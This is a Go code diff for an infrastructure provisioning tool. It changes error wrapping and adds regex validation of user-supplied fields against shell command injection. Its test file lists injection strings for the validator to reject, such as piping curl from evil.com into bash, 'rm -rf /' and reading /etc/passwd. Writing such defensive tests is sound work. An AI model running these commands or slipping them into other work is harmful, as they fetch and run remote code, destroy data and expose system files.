*Manager) GetInstanceByFilename(filename string) (*Instance, error) { env, err := jyaml.UnmarshalFromFile[v1alpha1.Environment](cacheFile) if err != nil { - return nil, fmt.Errorf("failed to read cache file: %v", err) + return nil, fmt.Errorf("failed to read cache file: %w", err) } fileInfo, err := os.Stat(cacheFile) if err != nil { - return nil, fmt.Errorf("failed to get file info: %v", err) + return nil, fmt.Errorf("failed to get file info: %w", err) } // Get instance status from provider diff --git a/pkg/provider/aws/cluster.go b/pkg/provider/aws/cluster.go index 01de61ee4..874e12f00 100644 --- a/pkg/provider/aws/cluster.go +++ b/pkg/provider/aws/cluster.go @@ -605,12 +605,12 @@ func (p *Provider) disableSourceDestCheck(cache *ClusterCache) error { func (p *Provider) createLoadBalancer(cache *ClusterCache) error { // Create Network Load Balancer if err := p.createNLB(cache); err != nil { - return fmt.Errorf("error creating NLB: %v", err) + return fmt.Errorf("error creating NLB: %w", err) } // Create target group for Kubernetes API (port 6443) if err := p.createTargetGroup(cache); err != nil { - return fmt.Errorf("error creating target group: %v", err) + return fmt.Errorf("error creating target group: %w", err) } return nil diff --git a/pkg/provider/aws/delete.go b/pkg/provider/aws/delete.go index 01003e435..42bdeb87e 100644 --- a/pkg/provider/aws/delete.go +++ b/pkg/provider/aws/delete.go @@ -65,7 +65,7 @@ func (p *Provider) deleteNLBForCluster(cache *ClusterCache) error { describeInput := &elasticloadbalancingv2.DescribeLoadBalancersInput{} describeOutput, err := p.elbv2.DescribeLoadBalancers(ctx, describeInput) if err != nil { - return fmt.Errorf("error describing load balancers: %v", err) + return fmt.Errorf("error describing load balancers: %w", err) } // Find load balancer by DNS name @@ -213,7 +213,7 @@ func (p *Provider) deleteEC2Instances(cache *AWS) error { p.log.Info("Instance %s confirmed terminated despite waiter error", id) return } - errChan <- fmt.Errorf("error waiting for instance %s termination: %v", id, waitErr) + errChan <- fmt.Errorf("error waiting for instance %s termination: %w", id, waitErr) return } diff --git a/pkg/provider/aws/nlb.go b/pkg/provider/aws/nlb.go index ce844b65e..eca668c03 100644 --- a/pkg/provider/aws/nlb.go +++ b/pkg/provider/aws/nlb.go @@ -65,7 +65,7 @@ func (p *Provider) createNLB(cache *ClusterCache) error { createLBOutput, err := p.elbv2.CreateLoadBalancer(ctx, createLBInput) if err != nil { p.fail() - return fmt.Errorf("error creating load balancer: %v", err) + return fmt.Errorf("error creating load balancer: %w", err) } if len(createLBOutput.LoadBalancers) == 0 { @@ -115,7 +115,7 @@ func (p *Provider) createTargetGroup(cache *ClusterCache) error { createTGOutput, err := p.elbv2.CreateTargetGroup(ctx, createTGInput) if err != nil { p.fail() - return fmt.Errorf("error creating target group: %v", err) + return fmt.Errorf("error creating target group: %w", err) } if len(createTGOutput.TargetGroups) == 0 { @@ -130,7 +130,7 @@ func (p *Provider) createTargetGroup(cache *ClusterCache) error { // Create listener to forward traffic from NLB to target group if err := p.createListener(cache); err != nil { - return fmt.Errorf("error creating listener: %v", err) + return fmt.Errorf("error creating listener: %w", err) } p.done() @@ -167,7 +167,7 @@ func (p *Provider) createListener(cache *ClusterCache) error { _, err := p.elbv2.CreateListener(ctx, createListenerInput) if err != nil { - return fmt.Errorf("error creating listener: %v", err) + return fmt.Errorf("error creating listener: %w", err) } p.log.Info("Created listener on port %d", k8sAPIPort) @@ -215,7 +215,7 @@ func (p *Provider) registerTargets(cache *ClusterCache) error { _, err := p.elbv2.RegisterTargets(ctx, registerInput) if err != nil { p.fail() - return fmt.Errorf("error registering targets: %v", err) + return fmt.Errorf("error registering targets: %w", err) } p.log.Info("Registered %d control-plane instance(s) with load balancer", len(targets)) @@ -258,7 +258,7 @@ func (p *Provider) deleteNLB(cache *ClusterCache) error { _, err := p.elbv2.DeleteLoadBalancer(ctx, deleteLBInput) if err != nil { p.fail() - return fmt.Errorf("error deleting load balancer: %v", err) + return fmt.Errorf("error deleting load balancer: %w", err) } p.log.Info("Deleted Network Load Balancer: %s", cache.LoadBalancerArn) @@ -282,7 +282,7 @@ func (p *Provider) deleteListener(cache *ClusterCache) error { describeOutput, err := p.elbv2.DescribeListeners(ctx, describeInput) if err != nil { - return fmt.Errorf("error describing listeners: %v", err) + return fmt.Errorf("error describing listeners: %w", err) } // Delete all listeners @@ -296,7 +296,7 @@ func (p *Provider) deleteListener(cache *ClusterCache) error { cancelDel() if err != nil { - return fmt.Errorf("error deleting listener %s: %v", aws.ToString(listener.ListenerArn), err) + return fmt.Errorf("error deleting listener %s: %w", aws.ToString(listener.ListenerArn), err) } } @@ -346,7 +346,7 @@ func (p *Provider) deleteTargetGroup(cache *ClusterCache) error { _, err = p.elbv2.DeleteTargetGroup(ctx, deleteTGInput) if err != nil { - return fmt.Errorf("error deleting target group: %v", err) + return fmt.Errorf("error deleting target group: %w", err) } return nil diff --git a/pkg/provisioner/provisioner.go b/pkg/provisioner/provisioner.go index fac577d4c..2463e1ea8 100644 --- a/pkg/provisioner/provisioner.go +++ b/pkg/provisioner/provisioner.go @@ -117,6 +117,11 @@ func (p *Provisioner) waitForNodeReboot() error { } func (p *Provisioner) Run(env v1alpha1.Environment) error { + // Validate all user-supplied inputs that will be interpolated into shell scripts + if err := templates.ValidateTemplateInputs(env); err != nil { + return fmt.Errorf("template input validation failed: %w", err) + } + dependencies := NewDependencies(&env) // Create kubeadm config file if required installer is kubeadm and not using legacy mode diff --git a/pkg/provisioner/templates/validate.go b/pkg/provisioner/templates/validate.go new file mode 100644 index 000000000..aaccf4af5 --- /dev/null +++ b/pkg/provisioner/templates/validate.go @@ -0,0 +1,133 @@ +/* + * Copyright (c) 2026, NVIDIA CORPORATION. All rights reserved. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package templates + +import ( + "fmt" + "regexp" + + "github.com/NVIDIA/holodeck/api/holodeck/v1alpha1" +) + +var ( + // versionPattern matches safe version strings (e.g., "v1.31.0", "5.15.0-1057-aws", "1.17.3-1", "550"). + // Rejects shell metacharacters that could lead to command injection. + versionPattern = regexp.MustCompile(`^[a-zA-Z0-9][a-zA-Z0-9.\-+~]*$`) + + // gitURLPattern matches safe git repository URLs. + gitURLPattern = regexp.MustCompile(`^https?://[a-zA-Z0-9][a-zA-Z0-9.\-/:@]*$`) + + // filePathPattern matches safe file system paths. + // Only allows alphanumeric chars, slashes, dots, underscores, hyphens, and tildes. + filePathPattern = regexp.MustCompile(`^[a-zA-Z0-9/._\-~]+$`) + + // gitRefPattern matches safe git references (branches, tags, SHAs, PR refs). + // Allows "/" for refs like "refs/tags/v1.31.0" or "refs/pull/123/head". + gitRefPattern = regexp.MustCompile(`^[a-zA-Z0-9][a-zA-Z0-9.\-+~/]*$`) +) + +// ValidateTemplateInputs validates user-supplied fields that will be interpolated +// into shell scripts generated by the provisioner templates. This prevents command +// injection via shell metacharacters in version strings, git URLs, and file paths. +func ValidateTemplateInputs(env v1alpha1.Environment) error { + // Validate version strings + versions := map[string]string{ + "nvidia driver version": env.Spec.NVIDIADriver.Version, + "nvidia driver branch": env.Spec.NVIDIADriver.Branch, + "container runtime version": env.Spec.ContainerRuntime.Version, + "nvidia container toolkit version": env.Spec.NVIDIAContainerToolkit.Version, + "kubernetes version": env.Spec.Kubernetes.KubernetesVersion, + "calico version": env.Spec.Kubernetes.CalicoVersion, + "cni plugins version": env.Spec.Kubernetes.CniPluginsVersion, + "crictl version": env.Spec.Kubernetes.CrictlVersion, + "kubelet release version": env.Spec.Kubernetes.KubeletReleaseVersion, + "kernel version": env.Spec.Kernel.Version, + } + + for name, value := range versions { + if value != "" && !versionPattern.MatchString(value) { + return fmt.Errorf("invalid %s: %q contains disallowed characters", name, value) + } + } + + // Validate release version if set + if env.Spec.Kubernetes.Release != nil && env.Spec.Kubernetes.Release.Version != "" { + if !versionPattern.MatchString(env.Spec.Kubernetes.Release.Version) { + return fmt.Errorf("invalid kubernetes release version: %q contains disallowed characters", env.Spec.Kubernetes.Release.Version) + } + } + + // Validate CTK package version if set + if env.Spec.NVIDIAContainerToolkit.Package != nil && env.Spec.NVIDIAContainerToolkit.Package.Version != "" { + if !versionPattern.MatchString(env.Spec.NVIDIAContainerToolkit.Package.Version) { + return fmt.Errorf("invalid nvidia container toolkit package version: %q contains disallowed characters", env.Spec.NVIDIAContainerToolkit.Package.Version) + } + } + + // Validate git URLs + gitURLs := map[string]string{} + if env.Spec.Kubernetes.Git != nil { + gitURLs["kubernetes git repo"] = env.Spec.Kubernetes.Git.Repo + } + if env.Spec.Kubernetes.Latest != nil { + gitURLs["kubernetes latest repo"] = env.Spec.Kubernetes.Latest.Repo + } + if env.Spec.NVIDIAContainerToolkit.Git != nil { + gitURLs["nvidia container toolkit git repo"] = env.Spec.NVIDIAContainerToolkit.Git.Repo + } + if env.Spec.NVIDIAContainerToolkit.Latest != nil { + gitURLs["nvidia container toolkit latest repo"] = env.Spec.NVIDIAContainerToolkit.Latest.Repo + } + + for name, value := range gitURLs { + if value != "" && !gitURLPattern.MatchString(value) { + return fmt.Errorf("invalid %s: %q contains disallowed characters", name, value) + } + } + + // Validate git refs + gitRefs := map[string]string{} + if env.Spec.Kubernetes.Git != nil { + gitRefs["kubernetes git ref"] = env.Spec.Kubernetes.Git.Ref + } + if env.Spec.NVIDIAContainerToolkit.Git != nil { + gitRefs["nvidia container toolkit git ref"] = env.Spec.NVIDIAContainerToolkit.Git.Ref + } + + for name, value := range gitRefs { + if value != "" && !gitRefPattern.MatchString(value) { + return fmt.Errorf("invalid %s: %q contains disallowed characters", name, value) + } + } + + // Validate file paths + filePaths := map[string]string{ + "private key path": env.Spec.PrivateKey, + "public key path": env.Spec.PublicKey, + "kubeconfig path": env.Spec.Kubernetes.KubeConfig, + "kind config path": env.Spec.Kubernetes.KindConfig, + "kubeadm config": env.Spec.Kubernetes.KubeAdmConfig, + } + + for name, value := range filePaths { + if value != "" && !filePathPattern.MatchString(value) { + return fmt.Errorf("invalid %s: %q contains disallowed characters", name, value) + } + } + + return nil +} diff --git a/pkg/provisioner/templates/validate_test.go b/pkg/provisioner/templates/validate_test.go new file mode 100644 index 000000000..f4b70aa6a --- /dev/null +++ b/pkg/provisioner/templates/validate_test.go @@ -0,0 +1,130 @@ +/* + * Copyright (c) 2026, NVIDIA CORPORATION. All rights reserved. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package templates + +import ( + "testing" + + "github.com/NVIDIA/holodeck/api/holodeck/v1alpha1" +) + +func TestVersionPattern(t *testing.T) { + accept := []string{"v1.31.0", "5.15.0-1057-aws", "1.17.3-1", "550", "v2.0.0+build.1"} + reject := []string{"; rm -rf /", "$(curl evil)", "`id`", "v1.0 && echo pwned", "v1|cat /etc/passwd"} + + for _, v := range accept { + if !versionPattern.MatchString(v) { + t.Errorf("versionPattern should accept %q", v) + } + } + for _, v := range reject { + if versionPattern.MatchString(v) { + t.Errorf("versionPattern should reject %q", v) + } + } +} + +func TestGitURLPattern(t *testing.T) { + accept := []string{ + "https://github.com/NVIDIA/holodeck", + "https://github.com/NVIDIA/holodeck.git", + "http://example.com/repo", + "https://token@github.com/org/repo.git", + } + reject := []string{ + "git@github.com:NVIDIA/holodeck.git", + "https://evil.com/repo; curl bad", + "https://evil.com/$(whoami)", + "file:///etc/passwd", + } + + for _, v := range accept { + if !gitURLPattern.MatchString(v) { + t.Errorf("gitURLPattern should accept %q", v) + } + } + for _, v := range reject { + if gitURLPattern.MatchString(v) { + t.Errorf("gitURLPattern should reject %q", v) + } + } +} + +func TestFilePathPattern(t *testing.T) { + accept := []string{"/home/user/.ssh/id_rsa", "~/.cache/key", "/tmp/file.txt", "relative/path"} + reject := []string{ + "/tmp; curl evil.com | bash", + "/path/$(whoami)/file", + "/path/`id`/file", + "/path && rm -rf /", + "path with spaces", + } + + for _, v := range accept { + if !filePathPattern.MatchString(v) { + t.Errorf("filePathPattern should accept %q", v) + } + } + for _, v := range reject { + if filePathPattern.MatchString(v) { + t.Errorf("filePathPattern should reject %q", v) + } + } +} + +func TestGitRefPattern(t *testing.T) { + accept := []string{"main", "v1.31.0", "refs/tags/v1.0", "refs/pull/123/head", "feature/my-branch"} + reject := []string{"; echo pwned", "$(id)", "ref`id`", "branch && bad"} + + for _, v := range accept { + if !gitRefPattern.MatchString(v) { + t.Errorf("gitRefPattern should accept %q", v) + } + } + for _, v := range reject { + if gitRefPattern.MatchString(v) { + t.Errorf("gitRefPattern should reject %q", v) + } + } +} + +func TestValidateTemplateInputs_Clean(t *testing.T) { + env := v1alpha1.Environment{} + env.Spec.NVIDIADriver.Version = "550" + env.Spec.ContainerRuntime.Version = "1.7.27" + env.Spec.Kubernetes.KubernetesVersion = "v1.35.0" + + if err := ValidateTemplateInputs(env); err != nil { + t.Errorf("expected no error for clean inputs, got: %v", err) + } +} + +func TestValidateTemplateInputs_EmptyFields(t *testing.T) { + env := v1alpha1.Environment{} + if err := ValidateTemplateInputs(env); err != nil { + t.Errorf("expected no error for empty fields, got: %v", err) + } +} + +func TestValidateTemplateInputs_Injection(t *testing.T) { + env := v1alpha1.Environment{} + env.Spec.NVIDIADriver.Version = "550; curl evil.com | bash" + + if err := ValidateTemplateInputs(env); err == nil { + t.Error("expected error for injection attempt, got nil") + } +}